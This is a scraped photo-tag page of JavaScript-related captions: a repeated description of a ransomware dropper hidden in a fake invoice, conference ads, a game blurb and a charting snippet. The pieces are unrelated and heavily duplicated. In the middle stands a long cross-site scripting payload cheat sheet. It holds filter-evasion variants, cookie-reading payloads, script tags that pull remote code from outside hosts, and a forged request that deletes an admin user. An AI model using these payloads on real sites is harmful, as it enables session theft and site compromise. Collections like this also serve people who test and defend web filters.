View allAll Photos Tagged Javascript
Part of the JavaScript code that was attached to an e-mail as a fake invoice in a zip file.
Once the user opens the malicious zip file the JavaScript code is executed and the ransomware software is downloaded from an infected website.
When the ransomware software is running it will encrypt all files that match particular extensions.
After encryption, a message (displayed on the user's desktop) instructs them to download the Tor browser and visit a specific criminal-operated Web site for further information.
Read more: en.wikipedia.org/wiki/Ransomware
Part of the JavaScript code that was attached to an e-mail as a fake invoice in a zip file.
Once the user opens the malicious zip file the JavaScript code is executed and the ransomware software is downloaded from an infected website.
When the ransomware software is running it will encrypt all files that match particular extensions.
After encryption, a message (displayed on the user's desktop) instructs them to download the Tor browser and visit a specific criminal-operated Web site for further information.
Read more: en.wikipedia.org/wiki/Ransomware
Part of the JavaScript code that was attached to an e-mail as a fake invoice in a zip file.
Once the user opens the malicious zip file the JavaScript code is executed and the ransomware software is downloaded from an infected website.
When the ransomware software is running it will encrypt all files that match particular extensions.
After encryption, a message (displayed on the user's desktop) instructs them to download the Tor browser and visit a specific criminal-operated Web site for further information.
Read more: en.wikipedia.org/wiki/Ransomware
Part of the JavaScript code that was attached to an e-mail as a fake invoice in a zip file.
Once the user opens the malicious zip file the JavaScript code is executed and the ransomware software is downloaded from an infected website.
When the ransomware software is running it will encrypt all files that match particular extensions.
After encryption, a message (displayed on the user's desktop) instructs them to download the Tor browser and visit a specific criminal-operated Web site for further information.
Read more: en.wikipedia.org/wiki/Ransomware
Part of the JavaScript code that was attached to an e-mail as a fake invoice in a zip file.
Once the user opens the malicious zip file the JavaScript code is executed and the ransomware software is downloaded from an infected website.
When the ransomware software is running it will encrypt all files that match particular extensions.
After encryption, a message (displayed on the user's desktop) instructs them to download the Tor browser and visit a specific criminal-operated Web site for further information.
Read more: en.wikipedia.org/wiki/Ransomware
Part of the JavaScript code that was attached to an e-mail as a fake invoice in a zip file.
Once the user opens the malicious zip file the JavaScript code is executed and the ransomware software is downloaded from an infected website.
When the ransomware software is running it will encrypt all files that match particular extensions.
After encryption, a message (displayed on the user's desktop) instructs them to download the Tor browser and visit a specific criminal-operated Web site for further information.
Read more: en.wikipedia.org/wiki/Ransomware
Part of the JavaScript code that was attached to an e-mail as a fake invoice in a zip file.
Once the user opens the malicious zip file the JavaScript code is executed and the ransomware software is downloaded from an infected website.
When the ransomware software is running it will encrypt all files that match particular extensions.
After encryption, a message (displayed on the user's desktop) instructs them to download the Tor browser and visit a specific criminal-operated Web site for further information.
Read more: en.wikipedia.org/wiki/Ransomware
A new era in Structure Synth (at least for me) - generating all the rules via javascript!!!!
I knew you could use javascript but I never went further than to use it for some animations - bad mistake!!
Turns out you can write complete rule sets using javascript and you have access to math functions and variables this way.
I have written a short tutorial over at DA which should be accessible by the public
Impressions from Skills Matter's FullStack Conference 2014.
MISSED THE CONFERENCE?
All talks have been recorded as SkillsCasts (film/code/slides) and are available to watch by Skills Matter's Community here: skillsmatter.com/conferences/6361-fullstack-node-and-java...
Joining the Skills Matter community is free, and it only takes a few minutes to sign up.
FULLSTACK 2015 - LONDON, JUNE 25-26TH
We are proud to announce FullStack 2015 – the conference on Node, JavaScript and hackable electronics. This year, we will bring the world's top innovators, hackers and experts together with our amazing developer community in London to learn and share skills, gain insights and drive innovation. Join to experience three days jam-packed with talks, demos, and coding.
Join us at FullStack 2015 in London on June 25-26th!
The FullStack 2015 will kick off with two days of talks and discussions over 4 tracks each day covering JavaScript, Node, hackable electronics and other topics you may tell us you wish to see.
Each track will feature talks by some of the world's top hackers and makers who are helping evolve technologies and practices in the exciting world of web, mobile, servers, drones and robots. In addition, each track will feature a Park Bench Panel discussion and 5 lightning talks by some of the great engineering teams in our community who use FullStack technologies and practices daily and will demo their projects.
Following two days of talks, we'll continue with a Saturday featuring hands-on Tutorials, so that you can gain some hands-on experience and practical skills to implement new ideas from the talks you attended and the people you met during the first 2 days!
Like the sound of that? Find out more here: skillsmatter.com/conferences/6612-fullstack-the-conferenc...
CALL FOR THOUGHTS NOW OPEN - SHARE YOUR IDEAS!
Skills Matter's community conferences are made possible thanks to our passionate community - who constantly feed us with their ideas. Who are the experts you would like to learn and share skills with next year? What topics would you like to see covered? How can we improve on 2014's conference? Help us create a great 3 days by submitting your thoughts, ideas, dreams and requirements through our Call For Thoughts Program (www.surveymonkey.com/s/VFGCDQ9) - and we'll start working on these straight away!
Part of the JavaScript code that was attached to an e-mail as a fake invoice in a zip file.
Once the user opens the malicious zip file the JavaScript code is executed and the ransomware software is downloaded from an infected website.
When the ransomware software is running it will encrypt all files that match particular extensions.
After encryption, a message (displayed on the user's desktop) instructs them to download the Tor browser and visit a specific criminal-operated Web site for further information.
Read more: en.wikipedia.org/wiki/Ransomware
Impressions from Skills Matter's FullStack Conference 2014.
MISSED THE CONFERENCE?
All talks have been recorded as SkillsCasts (film/code/slides) and are available to watch by Skills Matter's Community here: skillsmatter.com/conferences/6361-fullstack-node-and-java...
Joining the Skills Matter community is free, and it only takes a few minutes to sign up.
FULLSTACK 2015 - LONDON, JUNE 25-26TH
We are proud to announce FullStack 2015 – the conference on Node, JavaScript and hackable electronics. This year, we will bring the world's top innovators, hackers and experts together with our amazing developer community in London to learn and share skills, gain insights and drive innovation. Join to experience three days jam-packed with talks, demos, and coding.
Join us at FullStack 2015 in London on June 25-26th!
The FullStack 2015 will kick off with two days of talks and discussions over 4 tracks each day covering JavaScript, Node, hackable electronics and other topics you may tell us you wish to see.
Each track will feature talks by some of the world's top hackers and makers who are helping evolve technologies and practices in the exciting world of web, mobile, servers, drones and robots. In addition, each track will feature a Park Bench Panel discussion and 5 lightning talks by some of the great engineering teams in our community who use FullStack technologies and practices daily and will demo their projects.
Following two days of talks, we'll continue with a Saturday featuring hands-on Tutorials, so that you can gain some hands-on experience and practical skills to implement new ideas from the talks you attended and the people you met during the first 2 days!
Like the sound of that? Find out more here: skillsmatter.com/conferences/6612-fullstack-the-conferenc...
CALL FOR THOUGHTS NOW OPEN - SHARE YOUR IDEAS!
Skills Matter's community conferences are made possible thanks to our passionate community - who constantly feed us with their ideas. Who are the experts you would like to learn and share skills with next year? What topics would you like to see covered? How can we improve on 2014's conference? Help us create a great 3 days by submitting your thoughts, ideas, dreams and requirements through our Call For Thoughts Program (www.surveymonkey.com/s/VFGCDQ9) - and we'll start working on these straight away!
Part of the JavaScript code that was attached to an e-mail as a fake invoice in a zip file.
Once the user opens the malicious zip file the JavaScript code is executed and the ransomware software is downloaded from an infected website.
When the ransomware software is running it will encrypt all files that match particular extensions.
After encryption, a message (displayed on the user's desktop) instructs them to download the Tor browser and visit a specific criminal-operated Web site for further information.
Read more: en.wikipedia.org/wiki/Ransomware
Impressions from Skills Matter's FullStack Conference 2014.
MISSED THE CONFERENCE?
All talks have been recorded as SkillsCasts (film/code/slides) and are available to watch by Skills Matter's Community here: skillsmatter.com/conferences/6361-fullstack-node-and-java...
Joining the Skills Matter community is free, and it only takes a few minutes to sign up.
FULLSTACK 2015 - LONDON, JUNE 25-26TH
We are proud to announce FullStack 2015 – the conference on Node, JavaScript and hackable electronics. This year, we will bring the world's top innovators, hackers and experts together with our amazing developer community in London to learn and share skills, gain insights and drive innovation. Join to experience three days jam-packed with talks, demos, and coding.
Join us at FullStack 2015 in London on June 25-26th!
The FullStack 2015 will kick off with two days of talks and discussions over 4 tracks each day covering JavaScript, Node, hackable electronics and other topics you may tell us you wish to see.
Each track will feature talks by some of the world's top hackers and makers who are helping evolve technologies and practices in the exciting world of web, mobile, servers, drones and robots. In addition, each track will feature a Park Bench Panel discussion and 5 lightning talks by some of the great engineering teams in our community who use FullStack technologies and practices daily and will demo their projects.
Following two days of talks, we'll continue with a Saturday featuring hands-on Tutorials, so that you can gain some hands-on experience and practical skills to implement new ideas from the talks you attended and the people you met during the first 2 days!
Like the sound of that? Find out more here: skillsmatter.com/conferences/6612-fullstack-the-conferenc...
CALL FOR THOUGHTS NOW OPEN - SHARE YOUR IDEAS!
Skills Matter's community conferences are made possible thanks to our passionate community - who constantly feed us with their ideas. Who are the experts you would like to learn and share skills with next year? What topics would you like to see covered? How can we improve on 2014's conference? Help us create a great 3 days by submitting your thoughts, ideas, dreams and requirements through our Call For Thoughts Program (www.surveymonkey.com/s/VFGCDQ9) - and we'll start working on these straight away!
Impressions from Skills Matter's FullStack Conference 2014.
MISSED THE CONFERENCE?
All talks have been recorded as SkillsCasts (film/code/slides) and are available to watch by Skills Matter's Community here: skillsmatter.com/conferences/6361-fullstack-node-and-java...
Joining the Skills Matter community is free, and it only takes a few minutes to sign up.
FULLSTACK 2015 - LONDON, JUNE 25-26TH
We are proud to announce FullStack 2015 – the conference on Node, JavaScript and hackable electronics. This year, we will bring the world's top innovators, hackers and experts together with our amazing developer community in London to learn and share skills, gain insights and drive innovation. Join to experience three days jam-packed with talks, demos, and coding.
Join us at FullStack 2015 in London on June 25-26th!
The FullStack 2015 will kick off with two days of talks and discussions over 4 tracks each day covering JavaScript, Node, hackable electronics and other topics you may tell us you wish to see.
Each track will feature talks by some of the world's top hackers and makers who are helping evolve technologies and practices in the exciting world of web, mobile, servers, drones and robots. In addition, each track will feature a Park Bench Panel discussion and 5 lightning talks by some of the great engineering teams in our community who use FullStack technologies and practices daily and will demo their projects.
Following two days of talks, we'll continue with a Saturday featuring hands-on Tutorials, so that you can gain some hands-on experience and practical skills to implement new ideas from the talks you attended and the people you met during the first 2 days!
Like the sound of that? Find out more here: skillsmatter.com/conferences/6612-fullstack-the-conferenc...
CALL FOR THOUGHTS NOW OPEN - SHARE YOUR IDEAS!
Skills Matter's community conferences are made possible thanks to our passionate community - who constantly feed us with their ideas. Who are the experts you would like to learn and share skills with next year? What topics would you like to see covered? How can we improve on 2014's conference? Help us create a great 3 days by submitting your thoughts, ideas, dreams and requirements through our Call For Thoughts Program (www.surveymonkey.com/s/VFGCDQ9) - and we'll start working on these straight away!
Impressions from Skills Matter's FullStack Conference 2014.
MISSED THE CONFERENCE?
All talks have been recorded as SkillsCasts (film/code/slides) and are available to watch by Skills Matter's Community here: skillsmatter.com/conferences/6361-fullstack-node-and-java...
Joining the Skills Matter community is free, and it only takes a few minutes to sign up.
FULLSTACK 2015 - LONDON, JUNE 25-26TH
We are proud to announce FullStack 2015 – the conference on Node, JavaScript and hackable electronics. This year, we will bring the world's top innovators, hackers and experts together with our amazing developer community in London to learn and share skills, gain insights and drive innovation. Join to experience three days jam-packed with talks, demos, and coding.
Join us at FullStack 2015 in London on June 25-26th!
The FullStack 2015 will kick off with two days of talks and discussions over 4 tracks each day covering JavaScript, Node, hackable electronics and other topics you may tell us you wish to see.
Each track will feature talks by some of the world's top hackers and makers who are helping evolve technologies and practices in the exciting world of web, mobile, servers, drones and robots. In addition, each track will feature a Park Bench Panel discussion and 5 lightning talks by some of the great engineering teams in our community who use FullStack technologies and practices daily and will demo their projects.
Following two days of talks, we'll continue with a Saturday featuring hands-on Tutorials, so that you can gain some hands-on experience and practical skills to implement new ideas from the talks you attended and the people you met during the first 2 days!
Like the sound of that? Find out more here: skillsmatter.com/conferences/6612-fullstack-the-conferenc...
CALL FOR THOUGHTS NOW OPEN - SHARE YOUR IDEAS!
Skills Matter's community conferences are made possible thanks to our passionate community - who constantly feed us with their ideas. Who are the experts you would like to learn and share skills with next year? What topics would you like to see covered? How can we improve on 2014's conference? Help us create a great 3 days by submitting your thoughts, ideas, dreams and requirements through our Call For Thoughts Program (www.surveymonkey.com/s/VFGCDQ9) - and we'll start working on these straight away!
삶이란 자신이 콘트롤하고 싶어도 한계가 있는것같다. 점점 web space에 내 career가 pigeon hole되어 가고있다.
좋은건지 모르겠지만 분명한건 한가지이다. 나쁘진 않다.
Commet server나 만들어 볼까?
The picture is of all the books that I read since working at NTEL-X.
Part of the JavaScript code that was attached to an e-mail as a fake invoice in a zip file.
Once the user opens the malicious zip file the JavaScript code is executed and the ransomware software is downloaded from an infected website.
When the ransomware software is running it will encrypt all files that match particular extensions.
After encryption, a message (displayed on the user's desktop) instructs them to download the Tor browser and visit a specific criminal-operated Web site for further information.
Read more: en.wikipedia.org/wiki/Ransomware
Design created with my PixelFlow HTML5 / EaselJS example:
www.mikechambers.com/blog/2011/02/02/pixelflow-easeljs-ca...
Part of the JavaScript code that was attached to an e-mail as a fake invoice in a zip file.
Once the user opens the malicious zip file the JavaScript code is executed and the ransomware software is downloaded from an infected website.
When the ransomware software is running it will encrypt all files that match particular extensions.
After encryption, a message (displayed on the user's desktop) instructs them to download the Tor browser and visit a specific criminal-operated Web site for further information.
Read more: en.wikipedia.org/wiki/Ransomware
Funmin.com released yet another interesting online puzzle game. Just hook to your favorite game site to get relaxed. Get the points by just clicking the similar colored boxes that gets vanished. A simple puzzle game with no difficult instructions to read and follow. More points for more number of color boxes grouped together. Game ends at a default time limit to finish all the color boxes. Register your score in our database to bet your friends online. What more a free game can provide than an exciting time pass. Test your brain to get to top in scores.
A snapshot of the JavaScript source for Armor Alley, printed on 48 pages of 8.5" x 11". I started hand-writing notes on the back of the last page, and worked my way in from there.
This is a rather lousy angle, but it's fun to have concepts like code printed on paper.
alert(123);
alert("XSS");
alert(123)
alert("hellox worldss");
alert(“XSS”)
alert(“XSS”);
alert(‘XSS’)
“>alert(“XSS”)
alert(/XSS”)
alert(/XSS/)
alert(1)
‘; alert(1);
‘)alert(1);//
alert(1)
{font-family:''
<input/onmouseover="javaSCRIPT:confirm(1)"
alert(1) {Opera}
<img/src=`%00` onerror=this.onerror=confirm(1)
<isindex formaction="javascript:confirm(1)"
<img src=`%00`
 onerror=alert(1)

prompt(1)</ScRipT giveanswerhere=?
/*%00*/alert(1)/*%00*/</script /*%00*/
">%00
<iframe/src="data:text/html,">
</script
<script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
http://www.googlealert(document.location)</script
<img/src=@ onerror = prompt('1')
<style/onload=prompt('XSS')
alert(String.fromCharCode(49))</script ^__^
/**/alert(document.location)/**/</script :-(
�
/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
alert(0%0)
SPAN
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
">{-o-link-source:''
OnMouseOver {Firefox & Opera}
^__^
X {IE7}
<iframe/%00/ src=javaSCRIPT:alert(1)
////
/*iframe/src*/<iframe/src="
//|\\ //|\\ </script //|\\
/{src:''/
<plaintext/onmouseover=prompt(1)
''alert(1) {Opera}
DIV
On Mouse Over
<%
<iframe/src \/\/onload = prompt(1)
<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
<input value=<iframe/src=javascript:confirm(1)
<input type="text" value=`` X
www.alert(1)</script .com
alert(1)
MsgBox+1
<a href="data:text/html;base64_,">X</a
~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
</script a=\u0061 & /=%2F
</script
+-+-1-+-+alert(1)
/*<script* */alert(1)</script
<img src ?itworksonchrome?\/onerror = alert(1)
//
confirm(1);</script
alert(1)
alert(1) </script 1=2
style="x:">
<--` --!>
x
">
CLICKME
String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)
‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–>”>’>alert(String.fromCharCode(88,83,83))
alert(“XSS”)”>
<alert(“XSS”);//<
%253cscript%253ealert(1)%253c/script%253e
“>alert(document.cookie)
fooalert(1)
<script>alert(1)</script>
<IMG SRC=”javascript:alert(‘XSS’)”
<iframe src=http://ha.ckers.org/scriptlet.html <
javascript:alert("hellox worldss")
">'>alert(String.fromCharCode(88,83,83))
" SRC="http://ha.ckers.org/xss.js">
" '' SRC="http://ha.ckers.org/xss.js">
'" SRC="http://ha.ckers.org/xss.js">
'>" SRC="http://ha.ckers.org/xss.js">
document.write("<SCRI");PT SRC="http://ha.ckers.org/xss.js">
<alert("XSS");//<
">'>alert(String.fromCharCode(88,83,83))
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83))&submit.x=27&submit.y=9&cmd=search
alert("hellox worldss")&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
alert("XSS");&search=1
0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//-->">'>alert(String.fromCharCode(88,83%?2C83))&submit-frmGoogleWeb=Web+Search
hellox worldss
...
lol
<img src="
alert(1)">
alert(1)">
alert(1)">
alert(1)'>">
alert(1)">
alert(123)">
LOL
LOL*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}
({0:#0=alert/#0#/#0#(0)})
LOLalert(123)
<SCRIPT>alert(/XSS/.source)</SCRIPT>
\\";alert('XSS');//
</TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>
<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">
<BODY BACKGROUND=\"javascript:alert('XSS')\">
<BODY ONLOAD=alert('XSS')>
<IMG DYNSRC=\"javascript:alert('XSS')\">
<IMG LOWSRC=\"javascript:alert('XSS')\">
<BGSOUND SRC=\"javascript:alert('XSS');\">
<BR SIZE=\"&{alert('XSS')}">
<LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"></LAYER>
<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">
<LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\">
<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>
<XSS STYLE=\"behavior: url(xss.htc);\">
<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
<IMG SRC='vbscript:msgbox(\"XSS\")'>
<IMG SRC=\"mocha:[code]\">
<IMG SRC=\"livescript:[code]\">
žscriptualert(EXSSE)ž/scriptu
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"
<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>
<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
<TABLE BACKGROUND=\"javascript:alert('XSS')\">
<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">
<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">
<DIV STYLE=\"background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029\">
<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">
<DIV STYLE=\"width: expression(alert('XSS'));\">
<STYLE>@im\port'\ja\vasc\ript:alert(\"XSS\")';</STYLE>
<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">
<XSS STYLE=\"xss:expression(alert('XSS'))\">
exp/*<A STYLE='no\xss:noxss(\"*//*\");
xss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'>
<STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A>
<STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE>
<!--[if gte IE 4]>
<SCRIPT>alert('XSS');</SCRIPT>
<![endif]-->
<BASE HREF=\"javascript:alert('XSS');//\">
<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
<EMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"></EMBED>
<EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED>
a=\"get\";
b=\"URL(\\"\";
c=\"javascript:\";
d=\"alert('XSS');\\")\";
eval(a+b+c+d);
<HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://ha.ckers.org/xss.htc\"><xss:xss>XSS</xss:xss></HTML>
<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert('XSS');\">]]>
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<XML ID=\"xss\"><I><B><IMG SRC=\"javas<!-- -->cript:alert('XSS')\"></B></I></XML>
<SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN>
<XML SRC=\"xsstest.xml\" ID=I></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<HTML><BODY>
<?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\">
<?import namespace=\"t\" implementation=\"#default#time2\">
<t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>\">
</BODY></HTML>
<SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT>
<!--#exec cmd=\"/bin/echo '<SCR'\"--><!--#exec cmd=\"/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'\"-->
<? echo('<SCR)';
echo('IPT>alert(\"XSS\")</SCRIPT>'); ?>
<IMG SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\">
Redirect 302 /a.jpg victimsite.com/admin.asp&deleteuser
<META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\">
<HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT =\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT \"a='>'\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<A HREF=\"http://66.102.7.147/\">XSS</A>
<A HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\">XSS</A>
<A HREF=\"http://1113982867/\">XSS</A>
<A HREF=\"http://0x42.0x0000066.0x7.0x93/\">XSS</A>
<A HREF=\"http://0102.0146.0007.00000223/\">XSS</A>
<A HREF=\"htt p://6 6.000146.0x7.147/\">XSS</A>
<A HREF=\"//www.google.com/\">XSS</A>
<A HREF=\"//google\">XSS</A>
<A HREF=\"http://ha.ckers.org@google\">XSS</A>
<A HREF=\"http://google:ha.ckers.org\">XSS</A>
<A HREF=\"http://google.com/\">XSS</A>
<A HREF=\"http://www.google.com./\">XSS</A>
<A HREF=\"javascript:document.location='http://www.google.com/'\">XSS</A>
<A HREF=\"http://www.gohttp://www.google.com/ogle.com/\">XSS</A>
<
%3C
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
\x3c
\x3C
\u003c
\u003C
<iframe src=http://ha.ckers.org/scriptlet.html>
<IMG SRC=\"javascript:alert('XSS')\"
<SCRIPT SRC=//ha.ckers.org/.js>
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
<<SCRIPT>alert(\"XSS\");//<</SCRIPT>
<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\"XSS\")>
<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<IMG SRC=\" javascript:alert('XSS');\">
perl -e 'print \"<SCR\0IPT>alert(\\"XSS\\")</SCR\0IPT>\";' > out
perl -e 'print \"<IMG SRC=java\0script:alert(\\"XSS\\")>\";' > out
<IMG SRC=\"jav ascript:alert('XSS');\">
<IMG SRC=\"jav
ascript:alert('XSS');\">
<IMG SRC=\"jav ascript:alert('XSS');\">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">
<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=\"javascript:alert('XSS');\">
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
'';!--\"<XSS>=&{()}
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83))
'';!--"=&{()}
alert("XSS")">
<alert("XSS");//<
a=/XSS/alert(a.source)
\";alert('XSS');//
alert("XSS");
¼script¾alert(¢XSS¢)¼/script¾
@im\port'\ja\vasc\ript:alert("XSS")';
a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);
document.write("<SCRI");PT SRC="http://ha.ckers.org/xss.js">
TESTHTML5FORMACTION
crosssitespt
<img src="
alert(1)">
alert(1)">
alert(1)">
({0:#0=alert/#0#/#0#(123)})
ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x
Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()
{alert(1)};1
crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')
alert(1)
+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
%253cscript%253ealert(document.cookie)%253c/script%253e
“>alert(document.cookie)
“>alert(document.cookie)
“><alert(document.cookie);//<
fooalert(document.cookie)
<script>alert(document.cookie)</script>
%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E
‘; alert(document.cookie); var foo=’
foo\’; alert(document.cookie);//’;
alert(document.cookie)
alert(1)
">alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))
When I visit a Web site, I can click on "noscript" (http://noscript.net/), a Web security tool for the Firefox browser to see what Javascript they've loaded. That's the image above. I use noscript to disable Javascript by default and I can enable it only for trusted sites. But when sites like PC Magazine are so incredibly bloated with Javascript, if it's obvious there's content I'm looking for and is missing, I have a huge mess of Javascript to wade though. Many Web sites don't even have their main *content* show up unless Javascript is enabled. (To be fair, PC Mag does have way too much Javascript, but at least their content shows up. I've seen far more extensive JS lists on other sites which don't function at all unless you hit the right combination of domains to enable).
I'm not blocking your Javascript to deny you revenue. I'm blocking your Javascript to protect myself and my computer. Stop making my online experience miserable. If you must have a lot of Javascript, gracefully degrade or find a way to group it under fewer domains.
Best viewed in original size since flickr doesn't like transparent PNGs it seems.
Playing with my server side JS web framework (which is JSGI compliant)
So of course we need some eye candy: this is the default 404 page, which shows the dispatch table. Thanks to evilstreak for the styling/idea
First step in g.Raphaël. :)
Here is the code:
Raphael("piechart", 400, 300).g.piechart(150, 150, 100, [4, 4, 2, 1, 1, 1]).stroke("#fff").legend(["%%.% JS", "%%.% HTML", "%%.% CSS", "%%.% VM", "%%.% JAVA", "%%.% VMD"]).hover(function () {
this.sector.stop();
this.sector.scale(1.1, 1.1, this.cx, this.cy);
if (this.label) {
this.label[0].stop();
this.label[0].scale(1.5);
